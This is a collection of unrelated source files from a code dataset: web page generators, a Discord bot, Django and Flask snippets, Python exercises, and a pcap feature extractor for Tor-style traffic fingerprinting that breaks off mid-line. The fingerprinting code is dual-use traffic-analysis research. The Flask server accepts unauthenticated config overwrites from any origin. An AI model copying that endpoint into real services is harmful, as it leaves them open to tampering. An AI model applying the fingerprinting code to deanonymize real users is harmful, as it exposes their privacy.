\")[0]\n\t\t\tfilestr = team1 + \"-\" + team2 + \"-\" + filestr\n\treplacegold = str(goldarray)\n\t#print(filestr, team1, team2, goldarray)\n\n\tnew_js = []\n\tfor line in base_js_lines:\n\t\tnew_js.append(line)\n\tnew_js[0] = 'var gamegold = ' + replacegold + '\\n'\n\tnew_file_js = open(\"games/\"+filestr+\".js\", 'w')\n\tnew_file_js.writelines(new_js)\n\tnew_file_js.close()\n\n\treplacelist[0][1] = team1\n\treplacelist[1][1] = team2\n\treplacelist[2][1] = filestr + \".js\"\n\n\n\tnew_html = []\n\tfor line in base_html_lines:\n\t\tnew_html.append(line)\n\tfor index, line in enumerate(new_html):\n\t\tfor r in replacelist:\n\t\t\tnew_html[index] = new_html[index].replace(r[0], r[1])\n\tnew_file_html = open(\"games/\"+filestr+\".html\", 'w')\n\tnew_file_html.writelines(new_html)\n\tnew_file_html.close()\n\n\tprint(filestr, gol)\n\n\twhile week > len(weekgames):\n\t\tweekgames.append([])\n\tweekgames[week - 1].append(filestr)\nmaxlen = 0\nfor w in weekgames:\n\twlen = len(w)\n\tif wlen > maxlen:\n\t\tmaxlen = wlen\nmaxlen = maxlen/5\n\nprint(maxlen, \"maxlen\")\nbase_index = open(\"index_base.txt\", 'r')\nindex_html = open(\"LEC.html\", 'w')\nindex_html.writelines(base_index.readlines())\n\nnumweeks = len(weekgames)\nindex_html.write(\"\\n\")\nfor idxweek, w in enumerate(reversed(weekgames)):\n\tindex_html.write(\"\\n\")\n\twsorted = sorted(w, key = lambda x: x[-10:])\n\t#print(wsorted)\n\tfor i in range(0, int(maxlen)):\n\t\tindex_html.write(\"\\n\")\n\tindex_html.write(\"\\n\")\nindex_html.write(\"
\\n\")\n\t\tif len(w)/5 > i:\n\t\t\tindex_html.write(\"
week \" + str(numweeks - idxweek) + \" day \" + str(i + 1) + \"
\\n\")\n\t\telse:\n\t\t\tindex_html.write(\"
 
\\n\")\n\t\tfor g in range(i*5, (i+1)*5):\n\t\t\tif g < len(w):\n\t\t\t\tgame = wsorted[g]\n\t\t\t\twarr = game.split(\"-\")\n\t\t\t\t#print(game)\n\t\t\t\tindex_html.write(\"\" + warr[0] + \" vs \" + warr[1] + \"
\\n\")\n\t\t\telse:\n\t\t\t\tindex_html.write(\" 
\\n\")\n\t\tindex_html.write(\"
\\n\")\n","sub_path":"makepageLEC.py","file_name":"makepageLEC.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"641877518","text":"import discord\nfrom discord.ext import commands\nimport random\nfrom database.dbutils import *\nfrom utilities.utils import *\nfrom utilities.courses import *\nimport json\n\nclass TextCommands(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n self.database = self.client.database\n \n async def cmds(self, ctx):\n pass\n\n \n '''\n Get a List of \"Assignable\" roles, i.e: Non-Admin, Non-Mod, Non-Permission roles.\n Iterate through the Guild Roles, check if it has Permissions.\n We need to make sure the Role does not have these permissions:\n - Administrator\n - Manage Server\n - Manage Roles\n - Manage Channels\n - Kick Members\n - Ban Members\n - Manage Nicknames\n - Manage Emojis\n - Manage Webhooks\n '''\n @commands.command()\n async def me(self, ctx, *, arg):\n await add_roles(ctx, arg)\n \n ''' Remove a role from a user '''\n @commands.command()\n async def notme(self, ctx, *, arg):\n await remove_roles(ctx, arg)\n\n @commands.command()\n async def course(self, ctx):\n print(\"hello?\")\n await queryCourse(ctx, ctx.message)\n\n @commands.command()\n async def dice(self, ctx):\n message = ctx.message\n await message.channel.send('Would you like to roll the die? Y/N')\n def check(m):\n return (m.content.lower() == 'y' or m.content.lower() == 'yes') and m.author.id == message.author.id\n \n msg = await self.client.wait_for('message', check=check)\n await message.channel.send('You rolled a ' +str(random.randint(1, 6)))\n \ndef setup(bot):\n bot.add_cog(TextCommands(bot))","sub_path":"cogs/TextCommands.py","file_name":"TextCommands.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"516821614","text":"from re import findall\nfrom setuptools import setup, find_packages\n\n\n__description__ = '''\nA package to help you setting up new projects with a fitting environment.\nYou have an idea, get coding lickety split!\n'''\n\n\nmeta_file = open(\"licketysplit/metadata.py\").read()\nmetadata = dict(findall(\"__([a-z]+)__\\s*=\\s*'([^']+)'\", meta_file))\n\nwith open(\"README.md\", \"r\") as readme_file:\n long_description = readme_file.read()\n\n\nsetup(\n name=metadata['packagename'],\n version=metadata['version'],\n url=metadata['url'],\n author=metadata['author'],\n author_email=metadata['authoremail'],\n license=metadata['license'],\n description=__description__,\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n entry_points={\n 'console_scripts' : [ 'licketysplit=licketysplit:main' ],\n },\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Utilities'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"13886567","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport matplotlib.pylab as pl\nimport itertools\n\n# functions\ndef unique(list1):\n x = np.array(list1)\n return np.unique(x)\n\ndef createColors(colors_arr):\n colors_arr = unique(colors_arr)\n color_map = {}\n count = 0\n thick = 5\n palette = itertools.cycle([\n \"#000000\",\n \"#0000FF\",\n \"#8A2BE2\",\n \"#A52A2A\",\n \"#DEB887\",\n \"#5F9EA0\",\n \"#7FFF00\",\n \"#D2691E\",\n \"#6495ED\",\n \"#DC143C\",\n \"#00FFFF\",\n \"#00008B\",\n \"#008B8B\",\n \"#A9A9A9\",\n \"#006400\",\n \"#BDB76B\",\n \"#8B008B\",\n \"#556B2F\",\n \"#FF8C00\",\n \"#9932CC\",\n \"#8B0000\",\n \"#E9967A\",\n \"#8FBC8F\",\n \"#483D8B\",\n \"#2F4F4F\",\n \"#00CED1\",\n \"#9400D3\",\n \"#FF1493\",\n \"#00BFFF\",\n \"#696969\",\n \"#1E90FF\",\n \"#B22222\",\n \"#FFFAF0\",\n \"#228B22\",\n \"#FF00FF\",\n \"#DCDCDC\",\n \"#F8F8FF\",\n \"#FFD700\",\n \"#DAA520\",\n \"#808080\",\n \"#008000\",\n \"#ADFF2F\",\n \"#F0FFF0\",\n \"#FF69B4\",\n \"#CD5C5C\",\n \"#4B0082\",\n \"#FFFFF0\",\n \"#F0E68C\",\n \"#E6E6FA\",\n \"#FFF0F5\",\n \"#7CFC00\",\n \"#FFFACD\",\n \"#ADD8E6\",\n \"#F08080\",\n \"#E0FFFF\",\n \"#FAFAD2\",\n \"#90EE90\",\n \"#D3D3D3\",\n \"#FFB6C1\",\n \"#FFA07A\",\n \"#20B2AA\",\n \"#87CEFA\",\n \"#778899\",\n \"#B0C4DE\",\n \"#FFFFE0\",\n \"#00FF00\",\n \"#32CD32\",\n \"#FAF0E6\",\n \"#FF00FF\",\n \"#800000\",\n \"#66CDAA\",\n \"#0000CD\",\n \"#BA55D3\",\n \"#9370DB\",\n \"#3CB371\",\n \"#7B68EE\",\n \"#00FA9A\",\n \"#48D1CC\",\n \"#C71585\",\n \"#191970\",\n \"#F5FFFA\",\n \"#FFE4E1\",\n \"#FFE4B5\",\n \"#FFDEAD\",\n \"#000080\",\n \"#FDF5E6\",\n \"#808000\",\n \"#6B8E23\",\n \"#FFA500\",\n \"#FF4500\",\n \"#DA70D6\",\n \"#EEE8AA\",\n \"#98FB98\",\n \"#AFEEEE\",\n \"#DB7093\",\n \"#FFEFD5\",\n \"#FFDAB9\",\n \"#CD853F\",\n \"#FFC0CB\",\n \"#DDA0DD\",\n \"#B0E0E6\",\n \"#800080\",\n \"#FF0000\",\n \"#BC8F8F\",\n \"#4169E1\",\n \"#8B4513\",\n \"#FA8072\",\n \"#FAA460\",\n \"#2E8B57\",\n \"#FFF5EE\",\n \"#A0522D\",\n \"#C0C0C0\",\n \"#87CEEB\",\n \"#6A5ACD\",\n \"#708090\",\n \"#FFFAFA\",\n \"#00FF7F\",\n \"#4682B4\",\n \"#D2B48C\",\n \"#008080\",\n \"#D8BFD8\",\n \"#FF6347\",\n \"#40E0D0\",\n \"#EE82EE\",\n \"#F5DEB3\",\n \"#FFFFFF\",\n \"#F5F5F5\",\n \"#FFFF00\",\n \"#9ACD32\"])\n for i in colors_arr:\n color_map[i] = {\"color\": next(palette), \"thick\": thick}\n count = count + 1\n\n if thick == 5:\n thick = 9\n else:\n thick = 5\n\n return color_map\n\n# open\nwith open(\"./result_python.txt\") as f:\n content = f.readlines()\n\ncontent = [x.strip() for x in content]\n\n# initialize\nmy_dpi = 96\ncount = 1\nmax_x = 0\nmax_y = 0\ncolors_arr = []\ncount = 0\nthicks_x = []\nthicks_y = []\npoints = []\n\nfor c in content:\n c = c.split(\",\")\n x = int(c[0])\n r = int(c[1])\n\n if max_x < (x + r) * 1.05:\n max_x = int(round((x + r) * 1.05, 0))\n\n if max_y < (r * 1.05):\n max_y = int(round(r * 1.05, 0))\n\n colors_arr.append(r)\n\ncolor_map = createColors(colors_arr)\n\nfor i in range(0, max_x):\n thicks_x.append(i)\nfor i in range(0, max_y):\n thicks_y.append(i)\n\n# plot\nfig = plt.figure(figsize=(max_x, max_y), dpi=96)\n\nax = fig.add_subplot(111)\nax.axhline(y=0, linewidth=2, color='blue')\nax.axvline(x=0, linewidth=2, color='blue')\nax.set_xticks(thicks_x)\nax.set_yticks(thicks_y)\nax.set_xlim(0, max_x)\nax.set_ylim(0, max_y)\n\nfor c in content:\n print(\"Generating \" + str(count) + \" / \" + str(len(content)))\n \n c = c.split(\",\")\n x = int(c[0])\n r = int(c[1])\n \n circle = plt.Circle((x, 0), r, linewidth=color_map[r][\"thick\"], fill=False, edgecolor=color_map[r][\"color\"], zorder=1)\n ax.add_artist(circle)\n plt.scatter(x, r, s=3000, color=\"black\", zorder=2)\n \n points.append({\"x\": x, \"r\": r})\n \n count = count + 1\n \nfor point in points:\n x1 = point[\"x\"]\n y1 = point[\"r\"]\n \n for point2 in points:\n x2 = point2[\"x\"]\n y2 = point2[\"r\"]\n \n if x1 > x2:\n if abs(x1 - x2) == abs(y1 - y2):\n plt.plot([x1,x2], [y1,y2], linewidth=13, color=\"black\", zorder=2)\n \n if y1 == y2:\n plt.plot([x1,x2], [y1,y1], linewidth=13, color=\"black\", zorder=2)\n \n\nprint(\"Saving...\")\n\n\nplt.savefig(\"out4.png\", bbox_inches=\"tight\")\n","sub_path":"prime_numbers/part_5/run4.py","file_name":"run4.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"593131626","text":"\"\"\"\r\nWrite 5 students name and phone using write lines.\r\n\"\"\"\r\nfout = open('student.dat', 'w')\r\n# lst = []\r\n# for i in range(5):\r\n# name = input('Enter name - ')\r\n# phone = input('Phone - ')\r\n# strData = 'Name - '+name+' Phone - '+phone+'\\n'\r\n# lst.append(strData)\r\n#\r\n# print('List data is - ')\r\n# print(lst)\r\n# fout.writelines(lst)\r\n\r\nfor i in range(5):\r\n name = input('Enter name - ')\r\n phone = input('Phone - ')\r\n strData = 'Name - '+name+' Phone - '+phone+'\\n'\r\n print(strData)\r\n fout.write(strData)\r\nprint(\"OK I am done\")","sub_path":"FileHandling/WriteLilesStudentsToFile.py","file_name":"WriteLilesStudentsToFile.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"630062855","text":"from fabric.api import *\n\nproject = \"flask_skeleton\"\n\nenv.user = 'user'\nenv.hosts = ['server.com']\nenv.use_ssh_config = True\n\n\ndef d():\n \"\"\"\n deploy\n \"\"\"\n with cd(\"/home/mimu/dev/fskel\"):\n run(\"git pull origin master\")\n\n with prefix('source /home/mimu/dev/fskel/env/bin/activate'):\n run(\"pip install -r /home/mimu/dev/fskel/r.txt -q\")\n run(\"python manage.py -c app/deploy_config.py db upgrade\")\n run(\"python manage.py -c app/deploy_config.py uwsgi restart\")\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"454484041","text":"from django.conf.urls import patterns, include, url\n\nfrom app.views import *\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', home),\n url(r'^result/$', result),\n url(r'^clear/$', clear),\n url(r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"cleanup/cleanup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"637005078","text":"from flask import Flask, render_template\r\napp = Flask(__name__)\r\n\r\n\r\n\r\nimport json\r\nfrom flask import Flask, request, jsonify\r\n\r\napp = Flask(__name__)\r\n\r\ndef read_config():\r\n with open('data.json') as json_file:\r\n return json.load(json_file)\r\n\r\ndef write_config(data):\r\n with open('data.json', 'w') as outfile:\r\n json.dump(data, outfile)\r\n\r\n@app.route('/config', methods=['GET', 'POST'])\r\ndef get_config():\r\n if request.method == 'POST':\r\n write_config(request.get_json())\r\n\r\n response = jsonify(read_config())\r\n\r\n return response\r\n else:\r\n response = jsonify(read_config())\r\n\r\n return response\r\n\r\n@app.after_request\r\ndef after_request(response):\r\n response.headers.add('Access-Control-Allow-Origin', '*')\r\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')\r\n response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\r\n return response\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"384953354","text":"from django.db.models import Count\n\nfrom qa.models import Tag, Question, Category\n\n\ndef global_var(request):\n\n top_tag_qa = Tag.objects.all().annotate(count_q=Count('question')).order_by('-count_q')[:11]\n top_questions_qa = Question.objects.all().annotate(answers_count=Count('answer')).order_by(\"-views_number\")[:5]\n\n autocomplete_strings_qa_1 = Tag.objects.all().values_list('title', flat=True)\n autocomplete_strings_qa_2 = Category.objects.all().exclude(title='Toutes les catégories')\\\n .values_list('title', flat=True)\n\n qa_profile_id = None\n qa_profile_pro = None\n if request.user.is_authenticated:\n qa_profile_id = request.user.profil.id\n if request.user.profil.is_professional:\n qa_profile_pro = True\n\n context = {\n 'top_tag_qa': top_tag_qa,\n 'top_questions_qa': top_questions_qa,\n 'autocomplete_strings_qa_1': autocomplete_strings_qa_1,\n 'autocomplete_strings_qa_2': autocomplete_strings_qa_2,\n 'qa_profile_id': qa_profile_id,\n 'qa_profile_pro': qa_profile_pro\n }\n\n return context\n","sub_path":"qa/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"315988583","text":"\"\"\"\nGiven a string representing the sequence of moves a robot vacuum makes,\nreturn whether or not it will return to its original position.\nThe string will only contain L, R, U, and D characters, representing\nleft, right, up, and down respectively.\n\nEx: Given the following strings...\n\n\"LR\", return True\n\"URURD\", return False\n\"RUULLDRD\", return True\n\"\"\"\n\n\ndef main() -> None:\n \"\"\"Main Function\"\"\"\n moves = input('> ')\n\n lefts, ups = 0, 0\n for move in moves:\n if move == 'L':\n lefts += 1\n elif move == 'R':\n lefts -= 1\n elif move == 'U':\n ups += 1\n elif move == 'D':\n ups -= 1\n\n print(ups == lefts == 0)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"p3_vacuum_cleaner_route.py","file_name":"p3_vacuum_cleaner_route.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"24123700","text":"print('Pomyśl liczbę od 0 do 1000, a ja ją zgadnę w maximum. 10 próbach')\n\nminimum = 0\nmaximum = 1000\nattempts = 0\n\nwhile attempts < 10:\n guess = int((maximum - minimum) / 2) + minimum\n print(f'Zgaduję: {guess}')\n x = input('Za dużo, za mało, zgadłem? (akceptowane odpowiedzi: za dużo, za mało, zgadłeś): ')\n if x == 'zgadłeś':\n print('Wygrałem!')\n break\n elif x == 'za mało':\n minimum = guess\n attempts += 1\n elif x == 'za dużo':\n maximum = guess\n attempts += 1\n else:\n print('Nierozumiem')\n\nif attempts > 9:\n print('Nie oszukuj!')\n","sub_path":"Gra w zgadywanie liczb 2.py","file_name":"Gra w zgadywanie liczb 2.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"389440726","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n__author__ = \"coco\"\n__email__ = \"rlawnsgh0826@gmail.com\"\n__date__ = \"2019-08-26\"\n\n__last modified by__ = \"coco\"\n__last modified time__ = \"2019-09-25\"\n\n\n\"\"\"\nimport dpkt\nimport socket\nimport numpy as np\n\nfrom scipy.stats import skew\n\n\nclass flowGenerator:\n\n def __init__(self, pcap_path, ip):\n\n # initializer\n self._ip = ip\n self.total_cell, self.total_time_list, self.out_time_list, self.in_time_list = self.readPcap(pcap_path)\n\n def readPcap(self, pcap_path):\n\n tor_cell_list = list()\n out_time_list = list()\n in_time_list = list()\n total_time_list = list()\n\n pcap = dpkt.pcap.Reader(open(pcap_path, 'rb'))\n\n try:\n for timestamp, buf in pcap:\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n if eth.type != dpkt.ethernet.ETH_TYPE_IP:\n continue\n if ip.p != dpkt.ip.IP_PROTO_TCP:\n continue\n if socket.inet_ntoa(ip.src) == '192.168.160.10':\n continue\n if socket.inet_ntoa(ip.dst) == '192.168.160.10':\n continue\n\n # Start preprocessing\n if socket.inet_ntoa(ip.src) in self._ip:\n if len(buf) % 600 == 0:\n total_time_list.append(timestamp)\n out_time_list.append(timestamp)\n for _ in range(int(len(buf) // 600)):\n tor_cell_list.append(1)\n else:\n total_time_list.append(timestamp)\n out_time_list.append(timestamp)\n for _ in range(int(len(buf) // 600) + 1):\n tor_cell_list.append(1)\n else:\n if len(buf) % 600 == 0:\n total_time_list.append(timestamp)\n in_time_list.append(timestamp)\n for _ in range(int(len(buf) // 600)):\n tor_cell_list.append(-1)\n else:\n total_time_list.append(timestamp)\n in_time_list.append(timestamp)\n for _ in range(int(len(buf) // 600) + 1):\n tor_cell_list.append(-1)\n except AttributeError:\n pass\n except dpkt.dpkt.UnpackError:\n pass\n\n return tor_cell_list, total_time_list, out_time_list, in_time_list\n\n def getCellLength(self):\n\n # mean, std, var, skew\n return np.mean(self.total_cell), np.std(self.total_cell), np.var(self.total_cell), skew(self.total_cell)\n\n def getCellIAT(self):\n\n # min, max, mean, median, std, var, quantile(0.25, 0.75), skew\n iat_list = []\n out_iat_list = []\n in_iat_list = []\n\n total_time_list = list(set(self.total_time_list))\n out_time_list = list(set(self.out_time_list))\n in_time_list = list(set(self.in_time_list))\n\n for i, time in enumerate(total_time_list):\n if i == 0:\n continue\n _iat_time = total_time_list[i] - total_time_list[i - 1]\n iat_list.append(_iat_time)\n\n for i, time in enumerate(out_time_list):\n if i == 0:\n continue\n _iat_time = out_time_list[i] - out_time_list[i - 1]\n out_iat_list.append(_iat_time)\n\n for i, time in enumerate(in_time_list):\n if i == 0:\n continue\n _iat_time = in_time_list[i] - in_time_list[i - 1]\n in_iat_list.append(_iat_time)\n\n return np.min(iat_list), np.max(iat_list), np.mean(iat_list), np.median(iat_list), np.std(iat_list), np.var(\n iat_list), np.quantile(iat_list, 0.25), np.quantile(iat_list, 0.75), skew(iat_list), \\\n np.min(out_iat_list), np.max(out_iat_list), np.mean(out_iat_list), np.median(out_iat_list), np.std(\n out_iat_list), np.var(out_iat_list), np.quantile(out_iat_list, 0.25), np.quantile(out_iat_list, 0.75), skew(\n out_iat_list), \\\n np.min(in_iat_list), np.max(in_iat_list), np.mean(in_iat_list), np.median(in_iat_list), np.std(\n in_iat_list), np.var(in_iat_list), np.quantile(in_iat_list, 0.25), np.quantile(in_iat_list, 0.75), skew(\n in_iat_list)\n\n def getCellBurst(self):\n\n idx_list = []\n\n start = True # if 1, if False -1\n\n for i in range(len(self.total_cell) - 1):\n if self.total_cell[0] == 1:\n start = True\n else:\n start = False\n\n if self.total_cell[i] != self.total_cell[i + 1]:\n idx_list.append(i + 1)\n\n if idx_list[-1] != len(self.total_cell):\n idx_list.append(len(self.total_cell))\n\n ori_burst = [idx_list[0]] + np.diff(idx_list).tolist()\n if start is True:\n out_burst = ori_burst[0::2]\n in_burst = ori_burst[1::2]\n else:\n out_burst = ori_burst[1::2]\n in_burst = ori_burst[0::2]\n\n return np.max(ori_burst), np.mean(ori_burst), np.median(ori_burst), np.std(ori_burst), np.var(\n ori_burst), np.quantile(ori_burst, 0.25), np.quantile(ori_burst, 0.75), skew(ori_burst), \\\n np.max(out_burst), np.mean(out_burst), np.median(out_burst), np.std(out_burst), np.var(\n out_burst), np.quantile(out_burst, 0.25), np.quantile(out_burst, 0.75), skew(out_burst), \\\n np.max(in_burst), np.mean(in_burst), np.median(in_burst), np.std(in_burst), np.var(\n in_burst), np.quantile(in_burst, 0.25), np.quantile(in_burst, 0.75), skew(in_burst),\n\n def get30CellBurst(self):\n\n idx_list = []\n\n start = True # if 1, if False -1\n\n first30 = self.total_cell[:30]\n\n for i in range(len(first30) - 1):\n if first30[0] == 1:\n start = True\n else:\n start = False\n\n if first30[i] != first30[i + 1]:\n idx_list.append(i + 1)\n\n if idx_list[-1] != len(first30):\n idx_list.append(len(first30))\n\n ori_burst = [idx_list[0]] + np.diff(idx_list).tolist()\n if start is True:\n out_burst = ori_burst[0::2]\n in_burst = ori_burst[1::2]\n else:\n out_burst = ori_burst[1::2]\n in_burst = ori_burst[0::2]\n\n return np.max(ori_burst), np.mean(ori_burst), np.median(ori_burst), np.std(ori_burst), np.var(\n ori_burst), np.quantile(ori_burst, 0.25), np.quantile(ori_burst, 0.75), skew(ori_burst), \\\n np.min(out_burst), np.max(out_burst), np.mean(out_burst), np.median(out_burst), np.std(\n out_burst), np.var(out_burst), np.quantile(out_burst, 0.25), np.quantile(out_burst, 0.75), skew(out_burst), \\\n np.min(in_burst), np.max(in_burst), np.mean(in_burst), np.median(in_burst), np.std(in_burst), np.var(\n in_burst), np.quantile(in_burst, 0.25), np.quantile(in_burst, 0.75), skew(in_burst)\n\n def getCellPreposition(self):\n\n idx_list = []\n start = True\n\n cells = self.total_cell[:300]\n for c in range(len(cells) - 1):\n if cells[0] == 1:\n start = True\n else:\n start = False\n if cells[c] != cells[c + 1]:\n idx_list.append(c + 1)\n\n if idx_list[-1] != len(cells):\n idx_list.append(len(cells))\n\n ori = [idx_list[0]] + np.diff(idx_list).tolist()\n if start is True:\n in_pre = ori[0::2]\n else:\n in_pre = ori[1::2]\n\n return np.sum(in_pre), len(in_pre)\n\n def getCellOrdering(self):\n c1 = 0\n c2 = 0\n temp1 = []\n temp2 = []\n\n for cell in self.total_cell:\n if cell == 1:\n temp1.append(c1)\n c1 += 1\n if cell == -1:\n temp2.append(c2)\n c2 += 1\n\n return np.max(temp2), np.mean(temp2), np.median(temp2), np.std(temp2), np.var(temp2), np.quantile(temp2,\n 0.25), np.quantile(\n temp2, 0.75), skew(temp2), \\\n np.max(temp1), np.mean(temp1), np.median(temp1), np.std(temp1), np.var(temp1), np.quantile(temp1,\n 0.25), np.quantile(\n temp1, 0.75), skew(temp1)\n\n def getCellConcentration(self):\n\n out_concentration = []\n\n chunks = [self.total_cell[x:x + 30] for x in range(0, len(self.total_cell), 30)]\n for item in chunks:\n o = 0\n for p in item:\n if p == 1:\n o += 1\n out_concentration.append(o)\n\n return np.max(out_concentration), np.mean(out_concentration), np.median(out_concentration), np.std(\n out_concentration), np.var(out_concentration), np.quantile(out_concentration, 0.25), np.quantile(\n out_concentration, 0.75), skew(out_concentration)\n\n def getFirstLast30Cell(self):\n\n f30In = []\n f30Out = []\n l30In = []\n l30Out = []\n\n for cell in self.total_cell[:30]:\n if cell == 1:\n f30Out.append(cell)\n else:\n f30In.append(cell)\n\n for cell in self.total_cell[-30:]:\n if cell == 1:\n l30Out.append(cell)\n else:\n l30In.append(cell)\n\n percf30In = len(f30In) / float(30)\n percf30Out = len(f30Out) / float(30)\n percl30In = len(l30In) / float(30)\n percl30Out = len(l30Out) / float(30)\n\n return len(f30In), len(f30Out), len(l30In), len(l30Out), percf30In, percf30Out, percl30In, percl30Out\n\n def getGeneralInformation(self):\n\n num_of_total_pkts = len(self.total_cell)\n num_of_out_pkts = len(np.array(self.total_cell) == 1)\n num_of_in_pkts = len(np.array(self.total_cell) == -1)\n\n perc_out = num_of_out_pkts / float(num_of_total_pkts)\n perc_in = num_of_in_pkts / float(num_of_total_pkts)\n\n duration = self.total_time_list[-1] - self.total_time_list[0]\n\n pkt_per_sec = num_of_total_pkts / duration\n out_pkt_per_sec = num_of_out_pkts / duration\n in_pkt_per_sec = num_of_in_pkts / duration\n\n bytes_per_sec = np.sum(list(map(abs, self.total_cell))) / duration\n out_bytes_per_sec = np.sum(np.array(self.total_cell) == 1) / duration\n in_bytes_per_sec = abs(np.sum(np.array(self.total_cell) == -1)) / duration\n\n return num_of_total_pkts, num_of_out_pkts, num_of_in_pkts, duration, pkt_per_sec, out_pkt_per_sec, in_pkt_per_sec, bytes_per_sec, out_bytes_per_sec, in_bytes_per_sec\n\n def getFeature(self):\n\n mean_C, std_C, var_C, skew_C = self.getCellLength()\n\n minIat, maxIat, meanIat, medianIat, stdIat, varIat, fquanIat, lquanIat, skewIat, minOIat, maxOIat, meanOIat, medianOIat, stdOIat, varOIat, fquanOIat, lquanOIat, skewOIat, minIIat, maxIIat, meanIIat, medianIIat, stdIIat, varIIat, fquanIIat, lquanIIat, skewIIat = self.getCellIAT()\n\n max_B, mean_B, median_B, std_B, var_B, fquan_B, lquan_B, skew_B, \\\n max_OB, mean_OB, median_OB, std_OB, var_OB, fquan_OB, lquan_OB, skew_OB, \\\n max_IB, mean_IB, median_IB, std_IB, var_IB, fquan_IB, lquan_IB, skew_IB = self.getCellBurst() # len_IB, var_IB len_OB, len_B\n\n # f30_len_B\n f30_max_B, f30_mean_B, f30_median_B, f30_std_B, f30_var_B, f30_fquan_B, f30_lquan_B, f30_skew_B, \\\n f30_min_OB, f30_max_OB, f30_mean_OB, f30_median_OB, f30_std_OB, f30_var_OB, f30_fquan_OB, f30_lquan_OB, f30_skew_OB, \\\n f30_min_IB, f30_max_IB, f30_mean_IB, f30_median_IB, f30_std_IB, f30_var_IB, f30_fquan_IB, f30_lquan_IB, f30_skew_IB = self.get30CellBurst()\n\n incoming_preposition, len_incoming_preposition = self.getCellPreposition()\n\n max_in_o, mean_in_o, median_in_o, std_in_o, var_in_o, fquan_in_o, lquan_in_o, skew_in_o, \\\n max_out_o, mean_out_o, median_out_o, std_out_o, var_out_o, fquan_out_o, lquan_out_o, skew_out_o = self.getCellOrdering()\n\n max_O_conc, mean_O_conc, median_O_conc, std_O_conc, var_O_conc, fquan_O_conc, lauqn_O_conc, skew_O_conc = self.getCellConcentration() # len_O_conc\n\n f30In, f30Out, l30In, l30Out, percf30In, percf30Out, percl30In, percl30Out = self.getFirstLast30Cell()\n\n ntp, nop, nip, dura, pps, opps, ipps, bps, obps, ibps = self.getGeneralInformation() # nip, pco\n\n feature_array = [\n mean_C, std_C, var_C, skew_C, # 0, 1, 2, 3\n\n minIat, maxIat, meanIat, medianIat, stdIat, varIat, fquanIat, lquanIat, skewIat, # 4-12\n minOIat, maxOIat, meanOIat, medianOIat, stdOIat, varOIat, fquanOIat, lquanOIat, skewOIat, # 13-21\n minIIat, maxIIat, meanIIat, medianIIat, stdIIat, varIIat, fquanIIat, lquanIIat, skewIIat, # 22-30\n\n max_B, mean_B, median_B, std_B, var_B, fquan_B, lquan_B, skew_B, # 31-38\n max_OB, mean_OB, median_OB, std_OB, var_OB, fquan_OB, lquan_OB, skew_OB, # 39-46\n max_IB, mean_IB, median_IB, std_IB, var_IB, fquan_IB, lquan_IB, skew_IB, # 47-54\n\n f30_max_B, f30_mean_B, f30_median_B, f30_std_B, f30_var_B, f30_fquan_B, f30_lquan_B, f30_skew_B, # 55-62\n f30_min_OB, f30_max_OB, f30_mean_OB, f30_median_OB, f30_std_OB, f30_var_OB, f30_fquan_OB, f30_lquan_OB,\n f30_skew_OB, # 63-71\n f30_min_IB, f30_max_IB, f30_mean_IB, f30_median_IB, f30_std_IB, f30_var_IB, f30_fquan_IB, f30_lquan_IB,\n f30_skew_IB, # 72-80\n\n incoming_preposition, len_incoming_preposition, # 81-82\n\n max_in_o, mean_in_o, median_in_o, std_in_o, var_in_o, fquan_in_o, lquan_in_o, skew_in_o, # 83-90\n max_out_o, mean_out_o, median_out_o, std_out_o, var_out_o, fquan_out_o, lquan_out_o, skew_out_o, # 91-98\n\n max_O_conc, mean_O_conc, median_O_conc, std_O_conc, var_O_conc, fquan_O_conc, lauqn_O_conc, skew_O_conc,\n # 99-106\n\n f30In, f30Out, l30In, l30Out, percf30In, percf30Out, percl30In, percl30Out, # 107-114\n\n ntp, nop, nip, dura, pps, opps, ipps, bps, obps, ibps # 115-124\n ]\n\n return 